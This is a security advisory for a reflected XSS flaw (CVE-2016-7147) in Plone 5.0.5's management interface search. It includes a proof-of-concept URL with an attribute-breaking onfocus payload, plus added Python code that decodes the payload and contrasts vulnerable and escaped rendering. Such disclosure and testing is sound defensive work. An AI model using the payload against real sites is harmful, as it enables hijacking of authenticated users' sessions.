
Plone: XSS
Date: 2017-01-26 10:28:58
1. Introduction
Affected Product: Plone 5.0.5
Fixed in: Hotfix 20170117
Fixed Version Link: https://plone.org/security/hotfix/20170117
Vendor Contact: security@plone.org
Vulnerability Type: XSS (reflected)
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 01/26/2017
Release mode: Coordinated Release
CVE: CVE-2016-7147
Credits: Tim Coen of Curesec GmbH
2. Overview
Plone is an open source CMS written in Python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS because it echoes user input into an HTML attribute without encoding double quotes.
3. Details
CVSS (v2): Medium 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Description: The search functionality of the management interface (manage_findResult) is vulnerable to reflected XSS. As the input is echoed into an HTML attribute value, an attacker can use a double quote to close the current attribute, add new attributes (here autofocus and an onfocus handler) and thereby enter a JavaScript context. Note that the ZMI is normally only reachable by authenticated Zope users, so exploitation requires luring such a user to the crafted URL.
Proof of Concept:
http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec=%3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find
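To make the PoC concrete, the following added example (not part of the original advisory and not Plone's own code) URL-decodes the payload from the PoC above, shows it breaking out of a hypothetical value="" attribute the way the advisory describes, shows the same value rendered with proper attribute encoding, and provides a small check that can be run over a response body when re-testing a patched instance. The template string and the function names are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The advisory's proof-of-concept URL, copied verbatim from above.
POC_URL = (
    "http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all"
    "&obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm="
    "&obj_mspec=%3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find"
)


def injected_value(url: str, param: str = "obj_ids:tokens") -> str:
    """URL-decode the PoC and return the attacker-controlled search term."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query[param][0]


def render_unescaped(value: str) -> str:
    """Model of the bug: the search term is interpolated into a value=""
    attribute without encoding double quotes. This is a hypothetical
    template written for the example, not the actual ZMI form."""
    return '<input type="text" name="obj_ids:tokens" value="%s">' % value


def render_escaped(value: str) -> str:
    """Hardened form of the same template: quote=True turns '"' into &quot;
    so the value cannot terminate the attribute."""
    safe = html.escape(value, quote=True)
    return '<input type="text" name="obj_ids:tokens" value="%s">' % safe


def reflected_unescaped(body: str, value: str) -> bool:
    """Re-test helper: True if the raw (unencoded) payload is reflected in
    an HTML body, i.e. the attribute break-out still works."""
    return value in body


if __name__ == "__main__":
    payload = injected_value(POC_URL)
    print("decoded payload:", payload)
    print("vulnerable:", render_unescaped(payload))
    print("fixed:     ", render_escaped(payload))
    print("still reflected unescaped after fix?",
          reflected_unescaped(render_escaped(payload), payload))
```

In the vulnerable rendering the browser parses value="" followed by a free-standing autofocus attribute and an onfocus=alert(1) handler, and the trailing > closes the tag early; autofocus makes the handler fire without any user interaction once the page loads. The reflected_unescaped check is deliberately strict: after the hotfix the response should contain &quot; autofocus ... and never the raw payload.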
4. Solution
To mitigate this issue, apply hotfix 20170117 (https://plone.org/security/hotfix/20170117).
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 | Contacted vendor, vendor confirmed, requested CVE
09/06/2016 | CVE assigned
09/06/2016 | Vendor requests 90 days to release fix
01/10/2017 | Contacted vendor again, vendor announces hotfix
01/17/2017 | Vendor releases hotfix
01/26/2017 | Disclosed to public